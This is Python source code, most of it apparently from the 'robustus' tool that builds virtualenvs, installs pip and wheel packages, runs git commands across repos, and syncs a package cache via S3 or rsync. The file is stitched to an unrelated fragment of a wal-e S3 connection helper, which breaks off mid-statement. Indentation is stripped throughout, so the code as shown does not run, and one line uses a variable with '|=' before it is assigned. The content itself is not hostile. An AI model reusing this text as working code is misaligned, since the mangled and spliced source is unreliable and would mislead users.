script_dir = os.path.dirname(os.path.realpath(__file__))
setup_dir = os.path.abspath(os.path.join(script_dir, os.path.pardir))
logging.info('python_executable = %s' % python_executable)
logging.info('script_dir = %s' % script_dir)
logging.info('setup_dir = %s' % setup_dir)
os.chdir(setup_dir)
if os.path.exists('setup.py'):
run_shell([python_executable, 'setup.py', 'install'], settings['verbosity'] >= 1)
else:
logging.warn('Cannot find setup.py in %s. Continuing...' % setup_dir)
os.chdir(cwd)
logging.info('Robustus initialized environment with cache located at %s' % settings['cache'])
def install_satisfactory_requirement_from_remote(self, requirement_specifier):
"""
If wheel for satisfactory requirement found on remote, install it.
        :param requirement_specifier: specifies package name and package version string
:return: True if package installed by function (according to pip return code);
False otherwise.
"""
logging.info('Attempting to install package from remote wheel')
for find_link in self.settings['find_links']:
            find_links_url = find_link + '/python-wheels/index.html'  # TEMPORARY.
dtemp_path = tempfile.mkdtemp()
return_code = run_shell([self.pip_executable,
'install',
'--download-cache=%s' % dtemp_path,
'--no-index',
'--use-wheel',
'--find-links=%s' % find_links_url,
'--trusted-host=%s' % find_link.split("http://")[1],
requirement_specifier.freeze()],
verbose=self.settings['verbosity'] >= 2)
if return_code == 0:
                # The following downloads the wheels of the requirement (and those of
# dependencies) into a pip download cache and moves (renames) the downloaded
# wheels into the local Robustus cache. Regarding the need for this see "Wheels
# for Dependencies" "http://lucumr.pocoo.org/2014/1/27/python-on-wheels/".
for file_path in glob.glob(os.path.join(dtemp_path, 'http*.whl')):
if os.path.isfile(file_path):
file_name = os.path.basename(file_path)
file_name_new = file_name.rpartition('%2F')[-1]
file_path_new = os.path.join(self.cache, file_name_new)
shutil.move(file_path, file_path_new) # NOTE: Allow overwrites.
safe_remove(dtemp_path)
return True
else:
logging.info('pip failed to install requirement %s from remote wheels cache %s.'
% (requirement_specifier.freeze(), find_links_url))
safe_remove(dtemp_path)
return False
def install_through_wheeling(self, requirement_specifier, rob_file, ignore_index):
"""
Check if package cache already contains package of specified version, if so install it.
Otherwise make a wheel and put it into cache.
        Hopefully a manual check of the requirements file won't be necessary; waiting for pip 1.5 https://github.com/pypa/pip/issues/855
        :param requirement_specifier: specifies package name and version to install
        :param rob_file: open .rob cache file for this requirement
        :param ignore_index: whether to skip package indexes
:return: None
"""
# If wheelhouse doesn't contain necessary requirement attempt to install from remote wheel archive or make a wheel.
installed = False
if self.find_satisfactory_requirement(requirement_specifier) is None:
# Pip does not download the wheels of dependencies unless it installs.
installed = False
if not self.settings['no_remote_cache']:
installed = self.install_satisfactory_requirement_from_remote(requirement_specifier)
if not installed:
logging.info('Wheel not found, downloading package')
cmd = [self.pip_executable, 'install']
if len(self.settings['allow_external']) > 0:
cmd += ['--allow-external'] + self.settings['allow_external']
if self.settings['allow_all_external']:
cmd.append('--allow-all-external')
if len(self.settings['allow_unverified']) > 0:
cmd += ['--allow-unverified'] + self.settings['allow_unverified']
cmd += ['--download', self.cache, requirement_specifier.freeze()]
return_code = run_shell(cmd, verbose=self.settings['verbosity'] >= 2)
if return_code != 0:
raise RequirementException('pip failed to download requirement %s' % requirement_specifier.freeze())
logging.info('Done')
logging.info('Building wheel')
wheel_cmd = [self.pip_executable,
'wheel',
'--no-index',
'--find-links=%s' % self.cache,
'--wheel-dir=%s' % self.cache,
requirement_specifier.freeze()]
# we probably sometimes will want to see build log
for i in xrange(self.settings['verbosity']):
wheel_cmd.append('-v')
return_code = run_shell(wheel_cmd, verbose=self.settings['verbosity'] >= 1)
if return_code != 0:
raise RequirementException('pip failed to build wheel for requirement %s'
% requirement_specifier.freeze())
logging.info('Done')
if not installed:
# install from new prebuilt wheel
logging.info('Installing package from wheel')
return_code = run_shell([self.pip_executable,
'install',
'--no-index',
'--use-wheel',
'--find-links=%s' % self.cache,
requirement_specifier.freeze()],
verbose=self.settings['verbosity'] >= 2)
if return_code != 0:
raise RequirementException('pip failed to install requirement %s from wheels cache %s.'
% (requirement_specifier.freeze(), self.cache))
def _pip_install_requirement(self, requirement_specifier):
command = ' '.join([self.pip_executable, 'install', requirement_specifier.freeze()])
        logging.info('Got url-based requirement. '
                     'Falling back to pip shell command: %s' % (command,))
ret_code = run_shell(command, shell=True, verbose=self.settings['verbosity'] >= 1)
return ret_code
def install_requirement(self, requirement_specifier, ignore_index, tag):
attempts = self.settings['attempts']
logging.info('='*30) # Nicely separate installation of different packages in console output
for a in range(attempts):
result = self._install_requirement_attempt(requirement_specifier, ignore_index, tag, a)
if result:
return
def _install_requirement_attempt(self, requirement_specifier, ignore_index, tag, attempt_number):
if attempt_number == 0:
logging.info('Installing %s' % (requirement_specifier.freeze(),))
else:
logging.info('Installing %s (attempt %d)' % (requirement_specifier.freeze(), attempt_number + 1))
if tag:
logging.info('with tag %s, ignore_missing_refs %s' % (tag,
self.settings['ignore_missing_refs']))
if requirement_specifier.url is not None or requirement_specifier.path is not None:
            # install normally using pip
if not self.settings['update_editables'] and \
requirement_specifier.url is not None and \
requirement_specifier.editable:
editable_requirement_path = os.path.join(self.env, 'src', requirement_specifier.name)
logging.info('Got url-based requirement. Checking if exists %s ' % (editable_requirement_path,))
if tag is None and os.path.exists(editable_requirement_path):
logging.info('For safety reasons robustus will not proceed with requirement %s, '
                             'because the directory for installing this package already exists (%s). '
                             'To update the editable dependency, please remove the folder and run again.' %
(requirement_specifier.freeze(),
os.path.join(self.env, 'src', requirement_specifier.name)))
return False
# here we have to run via shell because requirement can be editable and then it will require
# extra parsing to extract -e flag into separate argument.
if tag and requirement_specifier.editable and requirement_specifier.path is None:
logging.info('Overriding editable branch with tag %s' % tag)
original_url = requirement_specifier.url
requirement_specifier.override_branch(tag)
ret_code = self._pip_install_requirement(requirement_specifier)
# special case for path-based requirements - we need to call 'git checkout'
if ret_code == 0 and tag and requirement_specifier.editable and requirement_specifier.path is not None:
cwd = os.getcwd()
os.chdir(requirement_specifier.path)
logging.info('Checking out editable branch in directory "%s" with tag %s' % (requirement_specifier.path, tag))
# Check if branch exists locally - should never be the case on Travis.
if not subprocess.check_output('git branch --list %s' % tag, shell=True):
'''
If the branch doesn't exist locally, we fetch it.
Note: it may seem more natural to do:
git checkout -b {branch} origin/{branch}
but that produces a git error:
fatal: git checkout: updating paths is incompatible with switching branches.
Did you intend to checkout 'origin/{branch}' which can not be resolved as commit?
See http://stackoverflow.com/questions/945654/git-checkout-on-a-remote-branch-does-not-work
'''
os.system('git fetch origin {0}:{0}'.format(tag))
local_checkout_code = os.system('git checkout {0}'.format(tag))
os.chdir(cwd)
            if local_checkout_code != 0:
                if self.settings['ignore_missing_refs']:
                    logging.info("Tag or branch doesn't exist for this package, using default")
else:
return False
if ret_code != 0 and tag and self.settings['ignore_missing_refs']:
                logging.info("Tag or branch doesn't exist for this package, using default")
requirement_specifier.url = original_url
ret_code = self._pip_install_requirement(requirement_specifier)
if ret_code != 0:
return False # do not print done, do not add package to the list of cached packages
else:
rob = os.path.join(self.cache, requirement_specifier.rob_filename())
if os.path.isfile(rob):
# package cached
# open for reading so install script can read required information
rob_file = open(rob, 'r')
else:
# package not cached
# open for writing so install script can save required information
rob_file = open(rob, 'w')
try:
try:
# try to use specific install script
install_module = importlib.import_module('robustus.detail.install_%s' % requirement_specifier.name.lower())
install_module.install(self, requirement_specifier, rob_file, ignore_index)
except ImportError:
self.install_through_wheeling(requirement_specifier, rob_file, ignore_index)
except Exception as exc:
logging.warn('Exception during installation: %s' % str(exc))
rob_file.close()
logging.warn('Robustus will delete the corresponding %s file in order '
'to recreate the wheel in the future. Please run again.' % str(rob))
# remove specifier from cached packages
self.cached_packages = [r for r in self.cached_packages
if r.freeze() != requirement_specifier.freeze()]
os.remove(rob)
return False
# add requirement to the list of cached packages
if self.find_satisfactory_requirement(requirement_specifier) is None:
self.cached_packages.append(requirement_specifier)
logging.info('Done')
return True
def find_satisfactory_requirement(self, requirement_specifier):
for requirement in self.cached_packages:
if requirement_specifier.allows(requirement):
return requirement
return None
def tag(self, args):
tag_name = args.tag
self._perrepo('git tag %s' % tag_name)
self._perrepo('git push origin %s' % tag_name)
def checkout(self, args):
self._perrepo('git fetch origin')
self._perrepo('git checkout -b {0} origin/{0}'.format(args.tag))
def perrepo(self, args):
# Use git to find the top-level working folder and run the command
cmd_str = ' '.join(args.command)
self._perrepo(cmd_str)
def reset(self, args):
if not args.force:
# Make sure that the user is sure
print 'Warning: this will delete any local changes you have made to the repos in this project. Press y to go ahead.'
if get_single_char().lower() != 'y':
print 'Aborting'
return
self._perrepo('git checkout -f')
self._perrepo('git checkout master')
self._perrepo('git pull origin master')
def _perrepo(self, cmd_str):
verbose = self.settings['verbosity'] > 0
run_shell('cd "$(git rev-parse --show-toplevel)" && . "%s" && %s'
% (self._activate_path(), cmd_str), shell=True, verbose=verbose)
for d in os.listdir(os.path.join(self.env, 'src')):
full_path = os.path.join(self.env, 'src', d)
if os.path.isdir(full_path):
logging.info('Running command in %s' % full_path)
run_shell('cd "%s" && . "%s" && %s' % (full_path, self._activate_path(),
cmd_str), shell=True, verbose=verbose)
def _activate_path(self):
"""Return the path to the virtual env activate file."""
return os.path.join(self.env, 'bin', 'activate')
def install(self, args):
# grab index locations
logging.info('Starting Robustus install using robustus version %s' % __version__)
if args.find_links is not None:
self.settings['find_links'] = args.find_links
# determine whether to do cloning of editable non-versioned requirements
self.settings['update_editables'] = args.update_editables
self.settings['no_remote_cache'] = args.no_remote_cache
self.settings['ignore_missing_refs'] = args.ignore_missing_refs
self.settings['allow_external'] = args.allow_external
self.settings['allow_all_external'] = args.allow_all_external
self.settings['allow_unverified'] = args.allow_unverified
tag = args.tag
if tag is not None:
logging.info('Installing with tag %s ignore_missing_refs=%s' %
(tag, str(self.settings['ignore_missing_refs'])))
self.settings['attempts'] = args.attempts
# construct requirements list
specifiers = args.packages
if args.editable is not None:
specifiers += ['-e ' + r for r in args.editable]
# NOTE: If "tag=tag" is not passed to "expand_requirements_specifiers", then the
# "requirements.txt" files expanded will be those on the default/"master" branch
# (i.e., default kwarg "tag=None") not the branch/tag indicated by value of "tag".
visited_sites = collections.OrderedDict()
requirements = expand_requirements_specifiers(specifiers, tag=tag, visited_sites=visited_sites,
ignore_missing_refs=self.settings['ignore_missing_refs'])
if args.requirement is not None:
for requirement_file in args.requirement:
requirements += read_requirement_file(requirement_file, tag,
ignore_missing_refs = self.settings['ignore_missing_refs'],
visited_sites=visited_sites)
if len(requirements) == 0:
raise RobustusException('You must give at least one requirement to install (see "robustus install -h")')
requirements = remove_duplicate_requirements(requirements)
logging.info('Here are all packages cached in robustus:\n' +
'\n'.join([r.freeze() for r in self.cached_packages]) + '\n')
logging.info('Here are all the requirements robustus is going to install:\n' +
'\n'.join([r.freeze() for r in requirements]) + '\n')
logging.info('These are all packages that were specified: \n' +
generate_dependency_list(visited_sites, selected_requirements=requirements))
# workaround for xcode 5.1 upgrade. clang fails if there are unused arguments
# specified during installation of some packages (cython, pygame, etc).
if sys.platform.startswith('darwin'):
os.environ['CFLAGS'] = '-Qunused-arguments'
os.environ['CPPFLAGS'] = '-Qunused-arguments'
# install
for requirement_specifier in requirements:
self.install_requirement(requirement_specifier, args.no_index, tag)
# Display the branch of the currently installed repos.
src_dirs = [os.path.join(os.getcwd(), 'venv', 'src', r.base_name().replace('_', '-')) for r in requirements if r.editable]
logging.info('{0} Running on the following branches: {0}'.format('='*10))
old_dir = os.getcwd()
for directory in src_dirs:
_, name_of_repo = os.path.split(directory)
try:
os.chdir(directory)
                msg = subprocess.check_output('git branch -rv --abbrev=40|grep $(git rev-parse HEAD)', shell=True)
try:
active_branch |= re.search('\\*\w+master', msg).group(0)
except Exception as err:
# Try a second option
pass
active_branch = re.search('origin/\w*', msg).group(0)
# http://stackoverflow.com/questions/6657690/python-getoutput-equivalent-in-subprocess
except Exception as err:
active_branch = ('<Could not find active branch - %s: %s>. Branch might be out-of-sync with origin. '
'Try running git pull and git push.' % (err.__class__.__name__, err.message))
# Debug what the hell is wrong
commands_to_try = ['git status', 'git branch -r', 'git branch']
for cmd in commands_to_try:
logging.info('-'*20)
logging.info('Trying command "%s"...' % cmd)
try:
msg = subprocess.check_output(cmd, shell=True)
logging.info(msg)
logging.info('...Success')
except Exception as err:
logging.info('... Failed with error - %s: %s' % (err.__class__.__name__, err.message))
logging.info('-'*20)
logging.info(' %s: %s' % (name_of_repo, active_branch))
os.chdir(old_dir)
logging.info('='*56)
def search_pkg_config_locations(self, locations=None):
"""
        Search for pkg-config file locations. Usually all libraries go into the '<env>/lib' folder, so
        we search it recursively for *.pc files.
"""
if locations is None:
locations = [os.path.abspath(os.path.join(self.env, 'lib'))]
pkg_files_dirs = set()
for loc in locations:
for root, dirnames, filenames in os.walk(loc):
for filename in fnmatch.filter(filenames, '*.pc'):
pkg_files_dirs.add(root)
return list(pkg_files_dirs)
def install_cmake_package(self, requirement_specifier, cmake_options, ignore_index, clone_url=None, install_dir=None):
"""
Build and install cmake package into cache & copy it to env.
"""
pkg_cache_dir = os.path.abspath(os.path.join(self.cache, '%s-%s' % (requirement_specifier.name,
requirement_specifier.version)))
def in_cache():
return os.path.isdir(pkg_cache_dir)
if not in_cache() and not ignore_index:
cwd = os.getcwd()
archive = None
download_dir = None
try:
if clone_url is not None:
retcode = run_shell(['git', 'clone', clone_url],
verbose=self.settings['verbosity'] >= 1)
if retcode != 0:
raise RequirementException('Failed to clone %s' % clone_url)
download_dir = os.path.abspath(requirement_specifier.name)
os.chdir(download_dir)
# checkout specific version (branch)
if requirement_specifier.version is not None:
retcode = run_shell(['git', 'checkout', '-b', requirement_specifier.version,
'--track', 'origin/%s' % requirement_specifier.version],
verbose=self.settings['verbosity'] >= 1)
if retcode != 0:
raise RequirementException('Failed to checkout branch %s in %s' % (requirement_specifier.version,
requirement_specifier.name))
# update submodules if any
run_shell(['git', 'submodule', 'update', '--init'],
verbose=self.settings['verbosity'] >= 1)
else:
archive = self.download(requirement_specifier.name, requirement_specifier.version)
download_dir = unpack(archive)
os.chdir(download_dir)
logging.info('Building %s' % requirement_specifier.name)
env = os.environ.copy()
env['PKG_CONFIG_PATH'] = ','.join(self.search_pkg_config_locations())
retcode = run_shell(['cmake', '.', '-DCMAKE_INSTALL_PREFIX=%s' % pkg_cache_dir] + cmake_options,
env=env,
verbose=self.settings['verbosity'] >= 1)
if retcode != 0:
raise RequirementException('%s configure failed' % requirement_specifier.name)
                # on bStem we can build with only a single thread, but bStem has 2 cores, thus
                # we use this formula to determine the number of threads for make
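                # e.g. cpu_count() == 2 -> 'make -j1', cpu_count() == 8 -> 'make -j4'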
retcode = run_shell(['make', '-j%i' % max(multiprocessing.cpu_count() / 2, 1)],
verbose=self.settings['verbosity'] >= 1)
if retcode != 0:
raise RequirementException('%s build failed' % requirement_specifier.name)
retcode = run_shell(['make', 'install'],
verbose=self.settings['verbosity'] >= 1)
if retcode != 0:
raise RequirementException('%s "make install" failed' % requirement_specifier.name)
except:
safe_remove(pkg_cache_dir)
raise
finally:
os.chdir(cwd)
safe_remove(archive)
safe_remove(download_dir)
if in_cache():
if install_dir is not None:
if os.path.exists(install_dir):
shutil.rmtree(install_dir)
shutil.copytree(pkg_cache_dir, install_dir)
else:
# install directly into venv
install_dir = self.env
distutils.dir_util._path_created = {}
distutils.dir_util.copy_tree(pkg_cache_dir, install_dir)
else:
raise RequirementException('can\'t find %s-%s in robustus cache' % (requirement_specifier.name, requirement_specifier.version))
return install_dir
def freeze(self, args):
for requirement in self.cached_packages:
print requirement.freeze()
def download(self, package, version):
"""
Download package archive, look for locations specified using --find-links. Store archive in current
working folder.
:param package: package name
:param version: package version
:return: path to archive
"""
logging.info('Searching for package archive %s-%s' % (package, version))
archive_base_name = '%s-%s' % (package, version)
extensions = ['.tar.gz', '.tar.bz2', '.zip']
for index in self.settings['find_links']:
for archive_name in [archive_base_name + ext for ext in extensions]:
try:
download(os.path.join(index, archive_name), archive_name, verbose=self.settings['verbosity'] >= 2)
return os.path.abspath(archive_name)
except urllib2.URLError:
pass
raise RequirementException('Failed to find package archive %s-%s' % (package, version))
def download_compiled_archive(self, package, version):
"""
Download compiled package archive, look for locations specified using --find-links. Store archive in current
working folder.
:param package: package name
:param version: package version
:return: path to archive or None if not found
"""
if self.settings['no_remote_cache']:
return None
if not platform.machine():
logging.warn('Cannot determine architecture from "platform.machine()".')
return None
archive_base_name = '%s-%s-%s' % (package, version, platform.machine())
logging.info('Searching for compiled package archive %s' % archive_base_name)
extensions = ['.compiled.tar.gz', '.compiled.tar.bz2', '.compiled.zip']
for index in self.settings['find_links']:
for archive_name in [archive_base_name + ext for ext in extensions]:
try:
download(os.path.join(index, archive_name), archive_name, verbose=self.settings['verbosity'] >= 2)
return os.path.abspath(archive_name)
except urllib2.URLError:
pass
logging.info('Failed to find compiled package archive %s' % archive_base_name)
return None
def download_cache_from_amazon(self, filename, bucket_name, key, secret):
if filename is None or bucket_name is None:
            raise RobustusException('In order to download from amazon S3 you should specify filename, '
'bucket, access key and secret access key, see "robustus download_cache -h"')
try:
import boto
from boto.s3.key import Key
# set boto lib debug to critical
logging.getLogger('boto').setLevel(logging.CRITICAL)
# connect to the bucket
conn = boto.connect_s3(key, secret)
bucket = conn.get_bucket(bucket_name)
# go through the list of files
cwd = os.getcwd()
os.chdir(self.cache)
for l in bucket.list():
if str(l.key) == filename:
l.get_contents_to_filename(filename)
break
os.chdir(cwd)
if not os.path.exists(os.path.join(self.cache, filename)):
raise RobustusException('Can\'t find file %s in amazon cloud bucket %s' % (filename, bucket_name))
except ImportError:
            raise RobustusException('To use S3 cloud, install the boto library into the robustus virtualenv')
except Exception as e:
raise RobustusException(e.message)
def download_cache(self, args):
"""
        Download wheels (binary package archives) from the given url and unzip them into the robustus cache.
        :return: None
"""
cwd = os.getcwd()
os.chdir(self.cache)
wheelhouse_archive = os.path.basename(args.url)
try:
if args.bucket is not None:
self.download_cache_from_amazon(wheelhouse_archive, args.bucket, args.key, args.secret)
else:
logging.info('Downloading ' + args.url)
subprocess.call(['rsync', '-r', '-l', args.url, '.'])
except:
os.chdir(cwd)
raise
wheelhouse_archive_lowercase = wheelhouse_archive.lower()
if wheelhouse_archive_lowercase.endswith('.tar.gz'):
logging.info('Unzipping')
subprocess.call(['tar', '-xzvf', wheelhouse_archive])
elif wheelhouse_archive_lowercase.endswith('.tar.bz'):
logging.info('Unzipping')
subprocess.call(['tar', '-xjvf', wheelhouse_archive])
elif wheelhouse_archive_lowercase.endswith('.zip'):
logging.info('Unzipping')
subprocess.call(['unzip', wheelhouse_archive])
if os.path.isfile(wheelhouse_archive):
os.remove(wheelhouse_archive)
os.chdir(cwd)
logging.info('Done')
def upload_cache_to_amazon(self, filename, bucket_name, key, secret, public):
if filename is None or bucket_name is None or key is None or secret is None:
            raise RobustusException('In order to upload to amazon S3 you should specify filename, '
                                    'bucket, access key and secret access key, see "robustus upload_cache -h"')
if os.path.isdir(filename):
raise RobustusException('Can\'t upload directory to amazon S3, please specify archive name')
try:
import boto
from boto.s3.key import Key
# set boto lib debug to critical
logging.getLogger('boto').setLevel(logging.CRITICAL)
# connect to the bucket
conn = boto.connect_s3(key, secret)
bucket = conn.get_bucket(bucket_name)
# create a key to keep track of our file in the storage
k = Key(bucket)
k.key = filename
k.set_contents_from_filename(filename)
if public:
k.make_public()
except ImportError:
            raise RobustusException('To use S3 cloud, install the boto library into the robustus virtualenv')
except Exception as e:
raise RobustusException(e.message)
def upload_cache(self, args):
cwd = os.getcwd()
os.chdir(self.cache)
# compress cache
cache_archive = os.path.basename(args.url)
cache_archive_lowercase = cache_archive.lower()
if cache_archive_lowercase.endswith('.tar.gz'):
subprocess.call(['tar', '-zcvf', cache_archive] + os.listdir(os.getcwd()))
elif cache_archive_lowercase.endswith('.tar.bz'):
subprocess.call(['tar', '-jcvf', cache_archive] + os.listdir(os.getcwd()))
elif cache_archive_lowercase.endswith('.zip'):
subprocess.call(['zip', cache_archive] + os.listdir(os.getcwd()))
try:
if args.bucket is not None:
self.upload_cache_to_amazon(cache_archive, args.bucket, args.key, args.secret, args.public)
else:
for file in glob.iglob('*'):
subprocess.call(['rsync', '-r', '-l', file, args.url])
finally:
if os.path.isfile(cache_archive):
os.remove(cache_archive)
os.chdir(cwd)
@staticmethod
def _create_args_parser():
        parser = argparse.ArgumentParser(description='Tool to make and configure a python virtualenv, '
                                                     'set up necessary packages and cache them if necessary.',
prog='robustus')
parser.add_argument('--env', help='virtualenv to use')
parser.add_argument('--cache', help='binary package cache directory')
parser.add_argument('-v',
'--verbose',
default=0,
action='count',
dest="verbosity",
help='give more output, option is additive, and can be used up to 3 times')
parser.add_argument('--debug',
action='store_true',
help="Take actions to assist with debugging such as not deleting packages which fail to build.")
subparsers = parser.add_subparsers(help='robustus commands')
        env_parser = subparsers.add_parser('env', help='create a robustus virtual environment')
env_parser.add_argument('env',
default='.env',
help='virtualenv arguments')
env_parser.add_argument('-p', '--python',
help='python interpreter to use')
env_parser.add_argument('--prompt',
default='(robustus)',
help='provides an alternative prompt prefix for this environment')
env_parser.add_argument('--system-site-packages',
default=False,
action='store_true',
help='give access to the global site-packages dir to the virtual environment')
env_parser.set_defaults(func=Robustus.env)
install_parser = subparsers.add_parser('install', help='install packages')
install_parser.add_argument('-r', '--requirement',
action='append',
                                    help='install all the packages listed in the given '
                                         'requirements file; this option can be used multiple times.')
install_parser.add_argument('packages',
nargs='*',
help='packages to install in format <package name>==version')
install_parser.add_argument('-e', '--editable',
action='append',
help='installs package in editable mode')
install_parser.add_argument('--no-index',
action='store_true',
help='ignore package index (only looking in robustus cache and at --find-links URLs)')
install_parser.add_argument('-f', '--find-links',
action='append',
                                    help='location where to find robustus packages; also passed to pip')
install_parser.add_argument('--update-editables',
action='store_true',
                                    help='clone all editable non-versioned requirements inside venv '
                                         '(by default robustus skips editable requirements)')
install_parser.add_argument('--tag',
action='store',
help='Install editables using tag or branch')
install_parser.add_argument('--ignore-missing-refs',
action='store_true',
help='Warn only but no error if a tag is missing (use with --tag)')
install_parser.add_argument('--no-remote-cache',
action='store_true',
help='Do not use remote cache for downloading of wheels')
install_parser.add_argument('--attempts',
action='store',
type=int,
                                    help='Number of attempts to install a package. '
                                         'Useful when working on an unreliable network where transient errors are possible',
                                    default=2)
install_parser.add_argument('--allow-external',
action='store',
nargs='+',
default=[],
help='allow pip to install selected external packages')
install_parser.add_argument('--allow-all-external',
action='store_true',
help='allow pip to install external packages')
install_parser.add_argument('--allow-unverified',
action='store',
nargs='+',
default=[],
help='allow pip to install selected unverified packages')
install_parser.set_defaults(func=Robustus.install)
perrepo_parser = subparsers.add_parser('perrepo',
help='Run command across the editable repos')
perrepo_parser.add_argument('command', nargs=argparse.REMAINDER)
perrepo_parser.set_defaults(func=Robustus.perrepo)
reset_parser = subparsers.add_parser('reset',
help='Reset all repos to clean master state')
        reset_parser.add_argument('-f', '--force', action='store_true', default=False)
reset_parser.set_defaults(func=Robustus.reset)
tag = subparsers.add_parser('tag',
help='Tag all editable repos and push tags')
tag.add_argument('tag', action='store')
tag.set_defaults(func=Robustus.tag)
checkout = subparsers.add_parser('checkout',
help='Perrepo shortcut to checkout a tag on all editables')
checkout.add_argument('tag', action='store')
checkout.set_defaults(func=Robustus.checkout)
freeze_parser = subparsers.add_parser('freeze', help='list cached binary packages')
freeze_parser.set_defaults(func=Robustus.freeze)
        download_cache_parser = subparsers.add_parser('download-cache', help='download cache from server or path; '
                                                                             'if robustus cache is not empty, '
                                                                             'cached packages will be added to existing ones')
download_cache_parser.add_argument('url', help='cache url (directory, *.tar.gz, *.tar.bz or *.zip)')
download_cache_parser.add_argument('-b', '--bucket',
help='amazon S3 bucket to download from')
download_cache_parser.add_argument('-k', '--key',
help='amazon S3 access key')
download_cache_parser.add_argument('-s', '--secret',
help='amazon S3 secret access key')
download_cache_parser.set_defaults(func=Robustus.download_cache)
upload_cache_parser = subparsers.add_parser('upload-cache', help='upload cache to server or path')
upload_cache_parser.add_argument('url', help='cache filename or url (directory, *.tar.gz, *.tar.bz or *.zip)')
upload_cache_parser.add_argument('-b', '--bucket',
help='amazon S3 bucket to upload into')
upload_cache_parser.add_argument('-k', '--key',
help='amazon S3 access key')
upload_cache_parser.add_argument('-s', '--secret',
help='amazon S3 secret access key')
upload_cache_parser.add_argument('-p', '--public',
action='store_true',
default=False,
                                         help='make the file uploaded to amazon S3 public')
upload_cache_parser.set_defaults(func=Robustus.upload_cache)
return parser
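    # Example command lines accepted by the parser above (illustrative;
    # paths, URLs and keys are placeholders):
    #   robustus env .env --python python2.7
    #   robustus --env .env install -r requirements.txt --find-links http://mirror/packages
    #   robustus --env .env upload-cache cache.tar.gz -b my-bucket -k KEY -s SECRET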
def execute(self, argv):
"""
Execute command in environment handled by robustus object.
"""
parser = Robustus._create_args_parser()
args = parser.parse_args(argv)
if args.func == Robustus.env:
Robustus.env(args)
else:
args.func(self, args)
def execute(argv):
logging.basicConfig(format="%(message)s", level=logging.INFO)
parser = Robustus._create_args_parser()
args = parser.parse_args(argv)
try:
if args.func == Robustus.env:
Robustus.env(args)
else:
robustus = Robustus(args)
args.func(robustus, args)
except (RobustusException, RequirementException) as exc:
logging.critical(exc.message)
exit(1)
except NameError as exc:
# Handle name errors specially since otherwise the way python does
# bin scripts it results in robustus being executed twice (which can
# be very confusing when debugging scripts)
import traceback
traceback.print_exc()
if __name__ == '__main__':
execute(sys.argv[1:])
|
|
import boto
from boto import s3
from boto.s3 import connection
from wal_e import log_help
logger = log_help.WalELogger(__name__)
_S3_REGIONS = {
# A map like this is actually defined in boto.s3 in newer versions of boto
# but we reproduce it here for the folks (notably, Ubuntu 12.04) on older
# versions.
'ap-northeast-1': 's3-ap-northeast-1.amazonaws.com',
'ap-southeast-1': 's3-ap-southeast-1.amazonaws.com',
'ap-southeast-2': 's3-ap-southeast-2.amazonaws.com',
'eu-west-1': 's3-eu-west-1.amazonaws.com',
'sa-east-1': 's3-sa-east-1.amazonaws.com',
'us-standard': 's3.amazonaws.com',
'us-west-1': 's3-us-west-1.amazonaws.com',
'us-west-2': 's3-us-west-2.amazonaws.com',
}
try:
# Override the hard-coded region map with boto's mappings if
# available.
from boto.s3 import regions
_S3_REGIONS.update(dict((r.name, r.endpoint) for r in regions()))
except ImportError:
pass
def _is_ipv4_like(s):
"""Find if a string superficially looks like an IPv4 address.
AWS documentation plays it fast and loose with this; in other
regions, it seems like even non-valid IPv4 addresses (in
particular, ones that possess decimal numbers out of range for
IPv4) are rejected.
"""
parts = s.split('.')
if len(parts) != 4:
return False
for part in parts:
try:
int(part)
except ValueError:
return False
return True
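# Illustrative behavior of the heuristic above (examples, not wal-e code):
#   _is_ipv4_like('10.0.0.1')            -> True
#   _is_ipv4_like('999.1.2.3')           -> True  (octets are not range-checked)
#   _is_ipv4_like('my.bucket.name')      -> False (only three dot-separated parts)
#   _is_ipv4_like('logs.2015.01.backup') -> False (non-numeric part)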
def _is_mostly_subdomain_compatible(bucket_name):
"""Returns True if SubdomainCallingFormat can be used...mostly
    This checks that, putting aside certificate validation issues,
    a bucket_name is able to use the SubdomainCallingFormat.
"""
return (bucket_name.lower() == bucket_name and
len(bucket_name) >= 3 and
len(bucket_name) <= 63 and
'_' not in bucket_name and
'..' not in bucket_name and
'-.' not in bucket_name and
'.-' not in bucket_name and
not bucket_name.startswith('-') and
not bucket_name.endswith('-') and
not bucket_name.startswith('.') and
not bucket_name.endswith('.') and
not _is_ipv4_like(bucket_name))
def _connect_secureish(*args, **kwargs):
"""Connect using the safest available options.
This turns on encryption (works in all supported boto versions)
and certificate validation (in the subset of supported boto
versions that can handle certificate validation, namely, those
after 2.6.0).
    Versions below 2.6 don't support the validate_certs option to
    S3Connection, and enabling it via a configuration option just
    seems to cause an error.
"""
if tuple(int(x) for x in boto.__version__.split('.')) >= (2, 6, 0):
kwargs['validate_certs'] = True
kwargs['is_secure'] = True
return connection.S3Connection(*args, **kwargs)
class CallingInfo(object):
"""Encapsulate information used to produce a S3Connection."""
def __init__(self, bucket_name=None, calling_format=None, region=None,
ordinary_endpoint=None):
self.bucket_name = bucket_name
self.calling_format = calling_format
self.region = region
self.ordinary_endpoint = ordinary_endpoint
def __repr__(self):
return ('CallingInfo({bucket_name}, {calling_format!r}, {region!r}, '
'{ordinary_endpoint!r})'.format(**self.__dict__))
def __str__(self):
return repr(self)
def connect(self, creds):
"""Return a boto S3Connection set up with great care.
This includes TLS settings, calling format selection, and
region detection.
The credentials are applied by the caller because in many
cases (instance-profile IAM) it is possible for those
        credentials to fluctuate rapidly.  By comparison, a bucket's
        region changes rarely, so it is cached here rather than looked
        up over and over.
"""
def _conn_help(*args, **kwargs):
return _connect_secureish(
*args,
provider=creds,
calling_format=self.calling_format(),
**kwargs)
# Check if subdomain format compatible; no need to go through
# any region detection mumbo-jumbo of any kind.
if self.calling_format is connection.SubdomainCallingFormat:
return _conn_help()
# Check if OrdinaryCallingFormat compatible, but also see if
# the endpoint has already been set, in which case only
# setting the host= flag is necessary.
assert self.calling_format is connection.OrdinaryCallingFormat
if self.ordinary_endpoint is not None:
return _conn_help(host=self.ordinary_endpoint)
# By this point, this is an OrdinaryCallingFormat bucket that
# has never had its region detected in this CallingInfo
# instance. So, detect its region (this can happen without
# knowing the right regional endpoint) and store it to speed
# future calls.
assert self.calling_format is connection.OrdinaryCallingFormat
assert self.region is None
assert self.ordinary_endpoint is None
conn = _conn_help()
bucket = s3.bucket.Bucket(connection=conn,
name=self.bucket_name)
try:
loc = bucket.get_location()
        except boto.exception.S3ResponseError as e:
if e.status == 403:
# A 403 can be caused by IAM keys that do not permit
# GetBucketLocation. To not change behavior for
# environments that do not have GetBucketLocation
# allowed, fall back to the default endpoint,
# preserving behavior for those using us-standard.
logger.warning(msg='cannot detect location of bucket',
detail=('The specified bucket name was: ' +
